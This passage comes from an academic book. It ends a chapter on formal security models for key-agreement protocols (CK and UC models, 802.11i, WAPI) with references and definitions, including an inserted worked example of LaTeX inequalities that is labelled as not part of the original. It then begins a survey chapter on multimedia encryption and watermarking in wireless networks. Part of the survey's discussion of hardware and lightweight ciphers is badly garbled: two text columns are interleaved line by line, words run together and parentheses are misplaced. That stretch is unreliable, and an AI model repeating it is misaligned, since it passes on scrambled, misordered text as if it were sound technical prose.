In this chapter we focused on the provably secure formal methods for key-agreement protocols, especially the CK model and the universally composable security model. First, these two models are introduced; then we gave a study of these two models. An analysis of the CK model presented its security analysis, advantages, and disadvantages, and a bridge between this formal method and the informal method (heuristic method) is established; an extension of the UC security model gives a universally composable anonymous hash certification model. Next, with the four-way handshake protocol in 802.11i and the Chinese WLAN security standard WAPI, we give the application of these two models. At last, the future trend of formal analysis methods for key-agreement protocols was presented.

References

Aboba, B., & Simon, D. (1999). PPP EAP TLS authentication protocol (RFC 2716). Retrieved from http://www.ietf.org/rfc/rfc2716.txt

Bellare, M., & Rogaway, P. (1993). Random oracles are practical: A paradigm for designing efficient protocols. In Proceedings of the First ACM Conference on Computer and Communications Security.

Bellare, M., & Rogaway, P. (1995). Provably secure session key distribution: The three party case. In Proceedings of the 27th ACM Symposium on the Theory of Computing—STOC'95 (pp. 57-66). ACM Press.

Bellare, M., Canetti, R., & Krawczyk, H. (1998). A modular approach to the design and analysis of authentication and key-exchange protocols. In Proceedings of the 30th Symposium on the Theory of Computing, STOC'98 (pp. 419-428).

Birgit, P., & Michael, W. (2001, May). A model for asynchronous reactive systems and its application to secure message transmission. In Proceedings of the IEEE Symposium on Security and Privacy, Oakland, CA (pp. 184-200).
Blake-Wilson, S., Johnson, D., & Menezes, A. (1997). Key agreement protocols and their security analysis. In Proceedings of the Sixth IMA International Conference on Cryptography and Coding.

Borisov, N., Goldberg, I., & Wagner, D. (2001). Intercepting mobile communications: The insecurity of 802.11. In Proceedings of the 7th Annual International Conference on Mobile Computing and Networking, Italy.

Brown, D. R. L. (2001). The exact security of ECDSA (IEEE 1363).

Burrows, M., Abadi, M., & Needham, R. M. (1990). A logic of authentication. ACM Transactions on Computer Systems, 8(1), 122-133.

Burton, S., & Kaliski, J. R. (2001). An unknown key-share attack on the MQV key agreement protocol. ACM Transactions on Information and System Security, 4(3), 275-288.

Canetti, R. (2001). Universally composable security: A new paradigm for cryptographic protocols. In Proceedings of the 42nd IEEE Annual Symposium on Foundations of Computer Science (pp. 136-145).

Canetti, R. (2004). Universally composable signature, certification, and authentication. In Proceedings of the 17th IEEE Computer Security Foundations Workshop (CSFW) (pp. 219-245). IEEE Computer Society Press.

Canetti, R., & Krawczyk, H. (2001). Analysis of key exchange protocols and their use for building secure channels. In B. Pfitzmann (Ed.), Advances in cryptology—EUROCRYPT 2001 (LNCS 2045, pp. 453-474). Berlin, Germany: Springer-Verlag.

Canetti, R., & Krawczyk, H. (2002). Universally composable notions of key exchange and secure channels. In Proceedings of Eurocrypt 2002.

Changhua, H., & Mitchell, C. J. (2004, October 1). Analysis of the 802.11i 4-way handshake. In Proceedings of the ACM Workshop on Wireless Security, WiSe'04, Philadelphia, PA.

Choo, K. K. R., & Hitchcock, Y. (2005). Security requirement for key establishment proof models: Revisiting Bellare-Rogaway and Jeong-Katz-Lee protocols. In Proceedings of the 10th Australasian Conference on Information Security and Privacy—ACISP.

Diffie, W., & Hellman, M. (1976). New directions in cryptography. IEEE Transactions on Information Theory, 22, 644-654.

Diffie, W., Van Oorschot, P., & Wiener, M. (1992). Authentication and authenticated key exchanges. Designs, Codes and Cryptography, 2, 107-125.

Fan, Z., JianFeng, M., & Moon, S. (2007). A universally composable anonymous hash certification model. Science in China (Series F), 50(3), 440-445.

Günther, C. G. (1990). An identity-based key-exchange protocol. In Advances in Cryptology—EUROCRYPT'89 (LNCS 434, pp. 29-37). Springer-Verlag.

IEEE 802.1X-2001. (2001). IEEE standard for local and metropolitan area networks—Port-based network access control.

IEEE P802.11i D3.0. (2002). Specification for enhanced security.

Krawczyk, H. (1996, February). SKEME: A versatile secure key exchange mechanism for Internet. In Proceedings of the Internet Society Symposium on Network and Distributed System Security (pp. 114-127).

Krawczyk, H. (2005). HMQV: A high-performance secure Diffie-Hellman protocol. In Advances in Cryptology—CRYPTO 2005: 25th Annual International Cryptology Conference (LNCS 3621, pp. 546-566). Springer-Verlag.

Law, L., Menezes, A., Qu, M., Solinas, J., & Vanstone, S. (1998). An efficient protocol for authenticated key agreement (Tech. Rep. CORR 98-05). Ontario, Canada: University of Waterloo, Department of Combinatorics & Optimization.
Li, X., Ma, J., & Moon, S. (2005). On the security of the Canetti-Krawczyk model (LNAI 3802, pp. 356-363). Springer-Verlag.

Martin, A., & Phillip, R. (2002). Reconciling two views of cryptography. Journal of Cryptology, 15(2), 103-127.

Meadows, C. (1996). Formal verification of cryptographic protocols: A survey. In Proceedings of the Advances in Cryptology, Asiacrypt'96 (LNCS 1163, pp. 135-150). Springer-Verlag.

Menezes, A., Van Oorschot, P., & Vanstone, S. (1996). Handbook of applied cryptography (Chapter 12). CRC Press.

Michael, B., & Dennis, H. (2004). How to break and repair a universally composable signature functionality. In Information Security Conference—ISC 2004 (LNCS 3225, pp. 61-74).

Mitchell, C. J., Ward, M., & Wilson, P. (1998). Key control in key agreement protocols. Electronics Letters, 34, 980-981.

National Standard of the People's Republic of China. (2003). Information technology—Telecommunications and information exchange between systems—Local and metropolitan area networks—Specific requirements—Part 11: Wireless LAN medium access control (MAC) and physical layer (PHY) specifications (GB 15629.11-2003).

National Standard of the People's Republic of China. (2004). Guide for GB 15629.11-2003 Information technology—Telecommunications and information exchange between systems—Local and metropolitan area networks—Specific requirements—Part 11: Wireless LAN medium access control (MAC) and physical layer (PHY) specifications and GB 15629.1102-2003 Information technology—Telecommunications and information exchange between systems—Local and metropolitan area networks—Specific requirements—Part 11: Wireless LAN medium access control (MAC) and physical layer (PHY) specifications: Higher-speed physical layer extension in the 2.4 GHz band.

Rigney, C., Willens, S., Rubens, A., & Simpson, W. (2000). Remote authentication dial in user service (RADIUS) (RFC 2865). Retrieved from http://www.ietf.org/rfc/rfc2865.txt

Shoup, V. (1999). On formal models for secure key exchange. Theory of Cryptography Library. Retrieved from http://citeseer.ist.psu.edu/cache/papers/cs2/769/http:zSzzSzeprint.iacr.orgzSz1999zSz012.pdf/shoup99formal.pdf

Tin, Y. S. T., Boyd, C., & Nieto, J. G. (2003). Provably secure key exchange: An engineering approach. In Australasian Information Security Workshop 2003 (AISW 2003) (pp. 97-104).

Wenbo, M. (2004). Modern cryptography: Theory and practice. Prentice-Hall PTR.

Yehuda, L. (2003). Composition of secure multi-party protocols—A comprehensive study (LNCS 2815). Springer-Verlag.

Key Terms

Acknowledgment (ACK) Property: Let F be an ideal functionality and let the protocol be an SK-secure KE protocol in the F-hybrid model. An algorithm I is said to be an internal state simulator for the protocol if for any environment machine Z and any adversary A we have HYB^F_{A,Z} ≈ HYB^F_{A,Z,I}. The protocol is said to have the ACK property if there exists a good internal state simulator for it.

Composition Theorem: The key advantage of UC security is that we can create a complex protocol from already designed sub-protocols that securely achieve the given local tasks. This is very important since complex systems are usually divided into several sub-systems, each one performing a specific task securely. Canetti presented this feature as the composition theorem (Canetti, 2001). This theorem assures that we can generally construct a large "UC-secure" cryptographic protocol by using sub-protocols that are proven secure in the UC sense.
Explicit Key Authentication: Explicit key authentication is the property obtained when both (implicit) key authentication and key confirmation hold.

(Implicit) Key Authentication: (Implicit) key authentication is the property whereby one party is assured that no other party aside from a specifically identified second party (and possibly additional identified trusted parties) may gain access to a particular secret key.

Key-Agreement Protocol: A key-agreement protocol or mechanism is a key establishment technique in which a shared secret is derived by two (or more) parties as a function of information contributed by, or associated with, each of these, (ideally) such that no party can predetermine the resulting value.

Key Confirmation: Key confirmation is the property whereby one party is assured that a second (possibly unidentified) party actually has possession of a particular secret key.

Session-Key Security: A KE protocol is called session-key secure (or SK-secure) if the following properties hold for any KE-adversary M:
1. The protocol satisfies the property that if two uncorrupted parties complete matching sessions then they both output the same key; and
2. The probability that M distinguishes the session key from a random value is no more than 1/2 plus a negligible fraction ε_M in the security parameter. ε_M is called the "advantage".

Universally Composable (UC) Security: In the UC framework, a real protocol securely realizes an ideal functionality F if, for ∀ A and ∀ Z, it has the same "action" as F. Formally, a protocol securely realizes an ideal functionality F if for any real-life adversary A there exists an ideal-process adversary S such that, for any environment Z and on any input, the probability that Z outputs "1" after interacting with A and parties running the protocol in the real-life model differs by at most a negligible fraction from the probability that Z outputs "1" after interacting with S and F in the ideal process.
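The two definitions above, and the way Lemma 2 earlier in the chapter uses the first of them, written out as inequalities. This is an added worked example, not part of the original chapter; the protocol is written π, the security parameter κ and the environment's input z, all notation assumed here rather than taken from the page.

```latex
\begin{align*}
&\text{SK-security (condition 2): for every KE-adversary } M \text{ and test bit } b \in \{0,1\}, \\
&\qquad \Pr\bigl[M \text{ outputs } b' = b\bigr] \;\le\; \tfrac12 + \varepsilon_M(\kappa),
\qquad \varepsilon_M(\kappa) \le \mathrm{negl}(\kappa), \\[4pt]
&\text{UC security: } \forall A\ \exists S\ \forall Z\ \forall z: \\
&\qquad \Bigl|\Pr\bigl[\mathrm{REAL}_{\pi,A,Z}(\kappa,z)=1\bigr]
 - \Pr\bigl[\mathrm{IDEAL}_{F,S,Z}(\kappa,z)=1\bigr]\Bigr| \;\le\; \mathrm{negl}(\kappa), \\[4pt]
&\text{Lemma 2, first method: } \varepsilon_1 \le \varepsilon_2, \text{ and }
\varepsilon_2 \text{ non-negligible} \;\Rightarrow\; B \text{ wins the CCA2 game for ENC} \\
&\qquad \text{with non-negligible probability, so } \varepsilon_1 \text{ non-negligible contradicts CCA2 security.}
\end{align*}
```

In the SK-security line, b = 1 means the test-session query returned the real session key and b = 0 an independent random value; the lemma's ε1 and ε2 are the advantages in exactly this distinguishing experiment for kd and for k'' respectively.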




Chapter XVI
Multimedia Encryption and Watermarking in Wireless Environment
Shiguo Lian
France Telecom R&D Beijing, China

Abstract

In a wireless environment, multimedia transmission is often affected by the error rate; d[…] power or bandwidth; and so forth, which brings difficulties to multimedia content protection. […] decade, wireless multimedia protection technologies have been attracting more and more researchers. Among them, wireless multimedia encryption and watermarking are two typical topics. Wireless multimedia encryption protects multimedia content's confidentiality in wireless networks […] on improving the encryption efficiency and channel friendliness. Some means have been proposed, such as the format-independent encryption algorithms that are time efficient compared […] ciphers; the partial encryption algorithms that reduce the encrypted data volume […] information unchanged; the hardware-implemented algorithms that are more efficient […]based ones; the scalable encryption algorithms that are compliant with bandwidth c[…]; and the robust encryption algorithms that are compliant with error channels. Compared with wireless multimedia encryption, wireless multimedia watermarking is widely used in ownership protection, traitor tracing, content authentication, and so forth. To keep the cost low, a mobile agent is used to partition some of the watermarking tasks. To counter transmission errors, some channel encoding methods are proposed to encode the watermark. To keep robustness, some means are proposed to embed a watermark into media data of low bit rate. Based on both watermarking and encryption algorithms, some applications arise, such as secure multimedia sharing or secure multimedia distribution. In this chapter, the existing wireless multimedia encryption and watermarking algorithms are summarized according to the functionality and multimedia type; their performances are analyzed and compared; the related application[s …]; and some open issues are proposed.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Multimedia Encryption

Introduction

With the development of multimedia technology and network technology, multimedia data are used more and more widely in people's daily life, such as mp3 sharing, video conferencing, video telephony, video broadcasting, video-on-demand, p2p streaming, and so forth. Since multimedia data may be related to privacy, profit, or copyright, multimedia content protection becomes necessary and urgent. It permits only the authorized users to access and read the multimedia data, it can detect modification of the multimedia data, it can prove the ownership of the multimedia data, it can even trace the illegal distribution of the multimedia data, and so forth.

During the past decades, some means have been proposed to protect multimedia data. Among them, multimedia encryption (Furht & Kirovski, 2006) and multimedia watermarking (Cox, Miller, & Bloom, 2002) are two typical ones. Multimedia encryption algorithms protect multimedia data's confidentiality by encoding or transforming the multimedia data into unintelligible forms under the control of the key. Thus, only the authorized users who have the correct key can recover the multimedia data successfully. Till now, some multimedia encryption algorithms have been proposed, which focus on security, time efficiency, and communication friendliness (Zeng, Zhuang, & Lan, 2004). Multimedia watermarking algorithms protect multimedia data's ownership by embedding ownership information into the multimedia data under the control of the key. Thus, the authorized users can extract or detect the ownership information and authenticate it. Many watermarking algorithms (Barni & Bartolini, 2004) have been proposed during the last decade, which consider security, imperceptibility, robustness, capacity, and so forth.

Recently, mobile/wireless multimedia communication has become more and more popular, which benefits from the improvement of the capability of mobile terminals and the bandwidth of wireless channels. Compared with wired communication, wireless multimedia communication has some special properties (Salkintzis & Passas, 2005). Firstly, the bandwidth is still limited compared with wired channels. Secondly, there are many more transmission errors in wireless communication, such as channel error, loss, delay, jitter, and so forth, which are caused by path error, fading, noise or interference, and so forth. Thirdly, wireless or mobile terminals are often of limited memory. Fourthly, the terminals are often energy-constrained because of the scale-limited battery. These properties impose some requirements on multimedia encryption and watermarking algorithms.

To meet mobile/wireless multimedia content protection needs, some mobile digital rights management (DRM) systems (Kundur, Yu, & Lin, 2004) have been proposed, such as Nokia's Music Player, NEC VS-7810, Open Mobile Alliance (OMA), and so forth. In these systems, multimedia encryption and multimedia watermarking are two core technologies. Compared with the wired environment, wireless multimedia encryption and watermarking should consider some extra requirements. For example, the algorithms should be lightweight in order to meet the energy constraints of the terminals. Additionally, the algorithms should be robust against transmission errors to some extent. Furthermore, the algorithms should be scalable to switch between wireless services and wired services.

During the past decade, some means have been proposed to make suitable wireless multimedia encryption and watermarking algorithms. These algorithms obtain security, efficiency, and error robustness by considering the properties of wireless/mobile multimedia communication. In this chapter, they are classified into several types according to their functionalities, and their performances are analyzed and compared. Additionally, some open issues are presented.

The rest of the chapter is arranged as follows. In the next section, the requirements of wireless/mobile multimedia encryption and watermarking are presented respectively. The multimedia encryption algorithms are analyzed and compared in the third section, and the watermarking algorithms are analyzed and compared in the fourth section. In the fifth section, some research topics and applications based on the combination of watermarking and encryption are presented, followed by some
open issues in the sixth section. Finally, in the last section, some conclusions are drawn.

General Requirements of Multimedia Content Protection

Requirements of Multimedia Encryption

Multimedia data are often of high redundancy and large volume, require real-time operations, and the compressed data are of a certain format. These properties require that wireless multimedia encryption algorithms satisfy some requirements (Furht & Kirovski, 2006), such as content security, time efficiency, format compliance, and so forth. All of them are presented in detail as follows.

Security. In multimedia encryption, security refers to content security. It is composed of two aspects, that is, cryptographic security and perceptual security. The former refers to the security against such cryptographic attacks as the brute-force attack, ciphertext-only attack, known-plaintext attack, and so forth. The latter refers to the intelligibility of the encrypted multimedia content. Generally, for multimedia encryption, an encryption algorithm is regarded as secure if the cost of breaking it is no smaller than the cost paid for the multimedia content's authorization. For example, in broadcasting, the news may be of no value after an hour. Thus, if the attacker cannot break the encryption algorithm within an hour, then the encryption algorithm may be regarded as secure in this application. Thus, in this case, encrypting only the significant parts of the multimedia data may be reasonable if cryptographic security and perceptual security are both confirmed, which will decrease the encrypted data volume.

Efficiency. Efficiency refers to both time efficiency and energy-consumption efficiency. Since real-time transmission or access is often required by multimedia-related applications, multimedia encryption algorithms should be time efficient so that they do not delay the transmission or access operations. Generally, two kinds of method can be adopted to improve time efficiency: the first is to reduce the encrypted data volume and the second is to adopt fast encryption algorithms. Additionally, to suit energy-constrained devices, such as mobile terminals, handsets, handhelds, and so forth, lightweight encryption algorithms are preferred to decrease energy consumption.

Compression ratio. Multimedia data are often compressed in order to reduce the storage space or transmission bandwidth. In this case, multimedia encryption algorithms should not change the compression ratio.

Format compliance. In multimedia data, the format information, such as the file header, frame header, file tail, and so forth, will be used by the decoder to realize synchronization. Encrypting the multimedia data except for the format information will keep the encrypted data stream format-compliant. Thus, the encrypted data can be previewed directly. Additionally, the format information can be used to resynchronize the transmission process in an error environment.

Communication compliance. In a wireless or mobile environment, transmission errors often happen, such as channel error, loss, delay, or jitter. A good multimedia encryption algorithm should not cause error propagation. Thus, the error conditions will also be considered when designing a wireless/mobile multimedia encryption algorithm.

Direct operation. If the encrypted multimedia data can be operated on directly, the decryption-operation-encryption triple can be avoided, and the efficiency can also be improved. A typical example is support for direct bit rate conversion, that is, the encrypted data stream can be cut off directly in order to adapt to the channel bandwidth. This property brings convenience to applications in a wireless or mobile environment.

Requirements of Multimedia Watermarking

For multimedia watermarking algorithms, some performances are required, such as security, robustness, transparency, oblivious detection, vindicability,
and efficiency (Cox et al., 2002). Here, only the ones related to the wireless/mobile environment are emphasized.

Security. Similar to an encryption algorithm, the construction of a watermarking algorithm should consider the security against various attacks (Kutter, Voloshynovskiy, & Herrigel, 2000; Linnartz & Dijk, 1998; Petitcolas, Anderson, & Kuhn, 1999). According to the attacker's ability, the attacks can be classified into several types: attacks knowing nothing about the watermarking system, attacks knowing some watermarked copies, attacks knowing the embedding algorithm, and attacks knowing the watermark detector. Generally, some encryption operations are introduced into watermarking algorithms in order to keep them secure.

Imperceptibility. Imperceptibility means that the watermarked media data are perceptually indistinguishable from the original ones. It is also named transparency or fidelity. This makes sure that the watermarked copy is still of high quality and suitable for practical applications.

Robustness. Multimedia data are often processed during the transmission process, and some of the processing operations are acceptable. Thus, the watermark should still be detectable after these operations. Generally, robustness refers to the ability of the watermark to survive such operations, including general signal processing operations (filtering, noising, A/D, D/A, re-sampling, recompression, etc.) and geometric attacks (rotation, scaling, shifting, transformation, etc.). For wireless/mobile multimedia, transmission errors should also be considered, such as loss, delay, jitter, and so forth.

Efficiency. Efficiency refers to both time efficiency and energy-consumption efficiency. A watermarking algorithm with high time efficiency is more suitable for real-time applications, such as video-on-demand, broadcasting, pay-per-view, and so forth. For some energy-limited devices, a lightweight watermarking algorithm is preferred, which costs less power and is more efficient in implementation.

Oblivious detection. Oblivious detection means that the detection process does not need the original copy. It is also named blind detection. On the contrary, non-blind detection means that the original copy is required by the detection process. In practical applications, especially in the wireless/mobile environment, memory is limited, and thus blind or oblivious detection is preferred.

The Encryption Algorithms for Wireless Multimedia

Some encryption algorithms have been proposed with respect to image, audio, speech, or video in the wireless environment. These algorithms adopt some means to meet wireless communication requirements. According to the functionality, the encryption algorithms are classified into four types: (1) format independent encryption, (2) format compliant encryption, (3) communication compliant encryption, and (4) direct-operation encryption. The first type supports media data of arbitrary format, the second one combines the encryption operation with the compression process, the third one considers the transmission errors, and the fourth one supports some direct operations on the encrypted multimedia data. In the following content, they are introduced and analyzed in detail.

Format Independent Encryption

Format independent encryption algorithms regard multimedia data as binary data and encrypt the multimedia data without considering the file format. Traditional ciphers (Mollin, 2006), such as DES, IDEA, AES, RSA, and so forth, encrypt text or binary data directly without considering the file format. These ciphers have been included in the protocols IP security (IPsec) and secure socket layer (SSL), and in the package CryptoAPI, and these protocols are also included in a multilayer security framework (Dutta, Das, Li, & Auley, 2004). The energy requirements of most of the encryption algorithms are analyzed in Potlapally, Raghunathan, and Jha (2003), some of which are suitable for wireless applications. However, for wireless multimedia, some means should be made to improve the efficiency. One solution is to implement the algorithms in hardware, and another one is to design lightweight algorithms.

Hardware implementation. To improve the encryption algorithms' efficiency, hardware implementation is a suitable solution. The security processing architectures are proposed in Raghunathan, Ravi, Hattangady, and Quisquater (2003), which include an embedded processor, a cryptographic hardware accelerator, and a programmable security

[…] such as WEP, IWEP, RC2, RC4, RC5, and so forth. Experiments are done in Ganz, Park, and Ganz (1998) to test the software efficiency of RC2, RC4, and RSA. It is shown that software implementation of these ciphers can meet the requirements of such wireless applications as multimedia e-mail, multimedia notes, telephone-quality audio, video conferencing or MPEG video interaction, and so forth. The disadvantage is that their performance is limited by the computer system configuration.
protocol engine. For the core encryption algorithms, Besides the experiments, some design guidelines
some experiments are done to show their suit- (Ganz, Park, & Ganz, 1999) are proposed for
ability. For example, hardware implementation of real-time software encryption, which considers
triple data encryption standard (3DES) is proposed the WLAN throughput, quality of serviceQoS) (
in Hamalainen, Hannikainen, Hamalainen, and requirements, encryption throughput determined
Saarinen (2001). The experiments show that 3DES bycomputerconfiguration,andadditional - process
implementations with small area and reasonable ing overhead incurred by other protocol layers.
throughput can be realized even though 3DES turns Generally, the algorithms with higher security
out to be quite large and resource-demanding. It are often of higher computing complexity. In tra-
is suitable for some applications in wireless LAN ditional applications, an encryption algorithm is
(WLAN). Compared with such block cipher as evaluated in a one-or-nothing manner, for example,
3DES, stream ciphers have some good properties, secure or insecure (Ong, Nahrstedt, & Yuan, 2003).
such as immunity to error propagation, increased In pervasive environments, it is insufficient, - be
exibility,
fl and greater efficiency. The Linear cause the limited computing resources may limit the
Feedback Shift Register (LFSR)-based stream security requirement. Thus, a quality of protection
ciphers are implemented in hardware (Goodman QoP)
( frameworkOng ( etal.)isproposed,which
& Chandrakasan, 1998), which are shown ideally evaluates an encryption algorithm in an adaptive
suited to low power wireless communications as manner. That is, the security level can be tuned in
they can be constructed from very simple and order to meet some other performances suitable
power- efficient hardware. Additionally, some
for wireless/mobile applications. For example, the
wireless suitable stream ciphers, for example, QoP metadata may be <content type, interval of
wired equivalent privacy (WEP), improved wired security, encryption algorithm, encryption key
equivalent privacy (IWEP), and Ron’s cipher #4 length, encryption block size>. By tuning these
(RC4) are implemented in hardware and tested in parameters in the metadata, the suitable perfor-
WLAN (Tikkanen, Hannikainen, Hamalainen, mances can be obtained. This framework has the
& Saarinen, 2000). Among them, IWEP is more following properties: (1) it can tune the quality of
suitable for hardware and of lower cost than protection, (2) it gets a balance between security
RC4 although it is of lower security than RC4. andperformancerequirement,andit ) 3 ( isexible
fl
Generally, hardware implementation improves and upgradable to support latest cryptographic
thecomputingefficiency,butitalsobrings some
standards. However, before using this scheme, some
problems, for example, the high cost to upgrade problems should be solved, for example, how and
the algorithms. where to store or transmit the metadata.
Lightweight encryption algorithms. Com-
pared with hardware implementation, software format compliant Encryption
implementation is cheaper and more exible fl for
upgrades. For wireless applications, some light- For multimedia data, partial encryption (Furht
weight encryption algorithms have been proposed, & Kirovski, 2006) can be used to reduce the en-

0
Multimedia Encryption

Figure 1. An example of partial encryption method

Data part
Encrypt
0

Data Data part Data Encrypted


Media data
partition 1 combination media data
... ...

Data part
N-1

crypteddatavolumes,whichkeepsthefile format
proposed to encrypt telephone-bandwidth speech.
unchanged. Additionally, the left format informa- This algorithm partitions the code stream into
tion can be used to synchronize the transmission two classes, for example, the most perceptually
process, especially in wireless/mobile environment relevant one, and the other one. Among them, the
where transmission errors often happen. The core former one is encrypted while the other one is left.
ofpartialencryptionisencrypting - only
It the signifi
is reported that encrypting about 45% of the
cant parameters in multimedia data while leaving bitstream achieves content protection equivalent
other ones unchanged. Figure 1 gives an example to full encryption. In another method (Sridharan,
for partial encryption, in which, media data are Dawson, & Goldburg, 1991), speech data are en-
partitionedintoNdataparts,onlythe first
crypted bydata part
encrypting only the parameters of Fast
is encrypted, while other parts are left unencrypted. Fourier Transformation during speech encoding,
The data part may be a block or region of the im- and the correct parameters are used to recover the
age, a frame of the video sequence, a bit-plane of encrypted data in decryption. For MP3 (Gang,
the image pixels, a parameter of the compression Akansu, Ramkumar, & Xie, 2001; Servetti, Testa,
codec, a segment of the compressed data stream, Carlos, & Martin, 2003) music, only the sensitive
and so forth. The encrypted data part (Data part parameters of MP3 stream are encrypted, such as
0) and the other data parts are then combined to- the bit allocation information, which saves much
gether to generate the encrypted media data. The time or energy cost.
significanceoftheencrypteddatapartdetermines Partial image encryption. Some means are
the security of the encryption scheme. proposed to encrypt images partially or selectively.
For multimedia data are often compressed Forrawimages,onlysomeofthemostsignificant
before stored or transmitted, partial encryption bit-planes are encrypted for secure transmission
often combines with compression codecs (Liu & of image data in mobile environments (Podesser,
Eskicioglu, 2003). That is, for different multimedia Schmidt, & Uhl, 2002). Another image encryption
encoding codec, different partial encryption algo- algorithmScopigno
( Belfiore,
& is
)024 proposed,
rithm will be designed. During the past decade, which encrypts only the edge information in the
some partial encryption algorithms have been image decomposition that produces three separate
proposed, which are classified and analyzed as (1) edge location, (2) gray-tone or color
components:
follows according to the type of multimedia data inside the edges, and (3) residuum “smooth” im-
and the codecs. age.ForJPEGimages,somesignificantbit-planes
Partial audio encryption. Based on audio or ofdiscretecosinetransform(DCT)coefficientsin
speech codecs, some partial encryption algorithms JBIG are encrypted (Pfarrhofer & Uhl, 2005), and
have been proposed. For example, an algorithm only DCT blocks are permuted and DCT coef-
based on G.729 (Servetti & Martin, 2002a, 2002b) is ficients’ signs are encrypted in JPEG encoding


(Lian, Sun, & Wang, 2004a). These algorithms obtain high perceptual security and encryption efficiency. In JPEG2000 image encryption, only the significant streams in the encoded data stream are encrypted (Ando, Watanabe, & Kiya, 2001, 2002; Lian, Sun, & Zhang, 2004b; Norcen & Uhl, 2003; Pommer & Uhl, 2003), which are selected according to the scalability in space or frequency domain. These algorithms often keep secure in perception. Figure 2 gives the encryption result of the algorithm proposed in Lian et al. (2004b). As can be seen, the encrypted image is unintelligible. Additionally, in these algorithms, no more than 20% of the data stream is encrypted, which obtains high efficiency.

Figure 2. Experimental result of the image encryption algorithm: (a) original image, (b) encrypted image [images not reproduced]

Partial video encryption. Compared with images or audios, videos are often of higher redundancy, which are compressed in order to save the transmission bandwidth. Among the video codecs, MPEG1/2, MPEG4, and H.264/AVC are more popular. Combined with them, some video encryption algorithms have been proposed, which save time cost by encrypting the compressed video data stream selectively or partially.

In MPEG1/2 codec, the signs of DCT coefficients are encrypted with the video encryption algorithm (VEA) (Shi & Bhargava, 1998a), the signs of direct current coefficients (DCs) and motion vectors are encrypted with a secret key (Shi & Bhargava, 1998b), the base layer is encrypted while the enhancement layer is left unencrypted (Tosun & Feng, 2001a), the DCT coefficients are permuted (Lian, Wang, & Sun, 2004c; Tang, 1996), or the variable length coding (VLC) tables are modified by rearranging, random bit-flipping, or random bit-insertion (Wu & Kuo, 2000, 2001).

In MPEG4 codec, the Minimal Cost Encryption Scheme (Kim, Shin, & Shin, 2005) is proposed to encrypt only the first 8 bytes in the macroblocks (MBs) of a video object plane (VOP). It

is implemented and proved suitable for wireless terminals. A format-compliant configurable encryption framework (Wen, Severa, Zeng, Luttrell, & Weiyin, 2002) is proposed for MPEG4 video encryption, which can be reconfigured for a given application scenario including wireless multimedia communication.

In H.264/AVC codec, the intra-prediction mode of each block is permuted with the control of the key (Ahn, Shim, Jeon, & Choi, 2004), which makes the video data degraded greatly. Some other algorithms (Lian, Liu, & Ren, 2005a; Lian, Liu, Ren, & Wang, 2006a) encrypt the DCT coefficients and motion vectors with sign encryption. Because these algorithms encrypt both the texture information and motion information, they often obtain high security in human perception. Figure 3 shows the results of the algorithm proposed in Ahn et al. (2004) and the one proposed in Lian et al. (2005a). As can be seen, the video encrypted by the former algorithm is still intelligible, while the video encrypted by the latter algorithm is unintelligible. Thus, for high security, the latter encryption algorithm is preferred.

Figure 3. Video encryption based on AVC codec: (a) original, (b) encrypted (Ahn et al., 2004), (c) encrypted (Lian et al., 2005a) [frames not reproduced]

Communication Compliant Encryption

Multimedia data are often encrypted before being transmitted. In the encrypted data stream, transmission errors are often spread out due to encryption algorithms' ciphertext-sensitivity (Mollin, 2006). In wireless/mobile applications, some means should be taken to reduce the error propagation.

Constructing the encryption algorithms based on error correction code may be a solution. For example, the encryption algorithm based on forward error correction (FEC) code is proposed in Tosun and Feng (2001b), which permutes the information bits and complements a subset of the bits. The encryption algorithm can preserve the error robustness of the encrypted multimedia data, that is, the encrypted data stream can realize error correction itself. Additionally, the encryption algorithm is implemented very efficiently because of the simple encryption operations. Thus, it has some desirable properties suitable for wireless multimedia transmission. However, the disadvantage is also clear: it is not secure against known-plaintext attacks.

Another solution is to change the block length in data encryption. Generally, the block length is in close relation with the error propagation property. Taking stream cipher and block cipher for example, the former one is of low error propagation, while the latter one is often of high error propagation. Generally, the bigger the block length is, the higher the error propagation is. Due to this, a robust encryption scheme for secure image transmission over wireless channels is proposed in Nanjunda,

Haleem, and Chandramouli (2005), which varies the block length according to the channel's error properties. This method obtains a trade-off between the security and error robustness. However, some problems should be solved beforehand, for example, how to transmit the parameters of varying the block length, and how to determine the channel's error properties in advance.

Additionally, segment-based encryption algorithms are proposed to reduce the effect caused by transmission errors. By partitioning the plaintext into segments and encrypting each segment independently, the transmission errors can be limited in a segment. The only difficulty is to synchronize segments. An example proposed in Lian, Liu, Ren, and Wang (2005b) is shown in Figure 4. It encrypts advanced video coding (AVC) videos according to the following steps: (1) partition the video data into N frames (each frame acts as a segment), (2) partition each frame into M macroblocks (each macroblock acts as a subsegment), and (3) encrypt each frame with different keys (K0, K1, …, KN-1), and encrypt all the macroblocks in a frame with the same key. Thus, if a macroblock is lost, the other macroblocks can still be recovered correctly. If a frame is lost, the frame index can be used to synchronize the key, and recover other frames correctly. Thus, if the synchronization problem is solved, the segment based encryption will be a good solution in wireless/mobile applications.

Figure 4. Robust video encryption based on segments [the video with key K is partitioned into Frame 0 … Frame N-1 with keys K0 … KN-1; each frame is partitioned into Slice 0 … Slice M-1, and all slices of a frame share that frame's key]

Figure 5. Scalable encryption scheme for MPEG2 video [the compressed media data consist of a base layer, middle layer, and enhancement layer; encryption produces the encrypted media data, cutting the enhancement layer produces the operated media data, and decryption produces the decrypted media data]

Direct Operation Supported Encryption

To operate the encrypted multimedia data directly without decryption is challenging while cost efficient. Especially in wireless/mobile environment, no decryption and re-encryption operations are required, which saves much cost. Some solutions have been proposed to realize direct transcoding or bit rate conversion.

A secure transcoding scheme is proposed in Chang, Han, Li, and Smith (2004). In this scheme, the multimedia data are decomposed into multiple streams at the source, each stream is encrypted independently, and each stream is annotated with cleartext metadata. In transcoding, lower priority streams are dropped directly based on the cleartext metadata. The receiver can decrypt the remaining streams and recombine them into the transcoded output stream.

As progressive and scalable encoding becomes more and more popular, such as JPEG2000, MPEG4 FGS, SVC, and so forth, scalable encryption is focused on, which supports direct bit rate conversion. The scalable encryption algorithm encrypts the progressive or scalable data streams, for example, base layer, middle layer, or enhancement layer, one by one from the significant ones to the least significant ones. Thus, the bit rate can be changed by cutting the insignificant streams directly. For example, Tosun and Feng (2000) proposed the algorithm shown in


